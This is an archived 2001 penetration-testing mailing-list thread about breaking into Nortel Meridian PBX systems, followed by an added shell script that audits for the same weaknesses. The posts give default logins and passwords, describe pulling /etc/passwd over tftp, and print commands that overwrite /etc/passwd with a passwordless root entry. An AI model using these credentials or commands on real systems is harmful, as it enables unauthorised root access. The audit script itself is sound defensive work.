Penetration Testing
mailing list archives
Re: Nortel Security
From: H D Moore <hdm () secureaustin com>
Date: Sat, 30 Jun 2001 12:54:05 -0500
If the PBX is hooked into the actual network, there are quite a few ways to
get access to the system. The easiest method is to tftp the /etc/passwd file
off the system and crack the hashes. If you go this route, you will get a
user account called "service" with a password of "smile" ;) If you log into
the system with this account, you will notice that /etc is mode 0777, so
getting root access is trivial:
$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd
I don't remember which version of this system it was, but the client software
that came with it was called "Meridian Terminal Emulator". You could manage
the PBX with this by first logging in with 0000/0000 then giving it the
manager password of "9999". I really wish I had more time to write up the
stuff I find out there...
-HD
On Saturday 30 June 2001 06:22 am, G A Evans wrote:
Try
http://support.dialogic.com/
and search for meridian. There is quite a bit of programming information.
You can also try a login of 0000 and password of 0000 for the Nortel
Meridian 1 PBX OS Release 2.
Tony Barnett
abarnettremovethisbit () ndirect co uk
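
Added example (not part of the original messages): a POSIX sh audit sketch for the two conditions described above, a world-writable /etc and passwd entries with an empty password field or an extra UID 0 account. The function names and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added audit sketch; function names are hypothetical, sample data is constructed.

# Succeeds (exit 0) if DIR is writable by "other" users, e.g. mode 0777.
# Parses the ls -ld permission string so it works without GNU stat.
is_world_writable() {
    perms=$(ls -ld "$1" | awk '{print $1}')
    # Character 9 of e.g. "drwxrwxrwx" is the other-write bit.
    [ "$(printf '%s' "$perms" | cut -c9)" = "w" ]
}

# Prints one finding per line for a passwd-format FILE:
#   EMPTY_PASSWORD:<user>  password field is empty (login needs no password)
#   EXTRA_UID0:<user>      a UID 0 account that is not named root
passwd_findings() {
    awk -F: '
        /^#/ || NF == 0            { next }
        $2 == ""                   { print "EMPTY_PASSWORD:" $1 }
        $3 == "0" && $1 != "root"  { print "EXTRA_UID0:" $1 }
    ' "$1"
}

# Audits ROOT/etc; prints findings and returns 1 if any were found.
audit_etc() {
    etc="$1/etc"
    rc=0
    if is_world_writable "$etc"; then
        echo "WORLD_WRITABLE_DIR:$etc"
        rc=1
    fi
    if [ -r "$etc/passwd" ]; then
        out=$(passwd_findings "$etc/passwd")
        if [ -n "$out" ]; then
            echo "$out"
            rc=1
        fi
    fi
    return $rc
}

# Demo on a constructed tree (not data from a real system).
demo_root=$(mktemp -d)
mkdir "$demo_root/etc"
chmod 0777 "$demo_root/etc"
printf '%s\n' 'root::0:0:root:/root:/bin/sh' \
    'service:x:100:100::/home/service:/bin/sh' > "$demo_root/etc/passwd"
audit_etc "$demo_root" || echo "findings present"
rm -rf "$demo_root"
```

Pass "" as ROOT to audit the live /etc, or a mount point to audit an offline image.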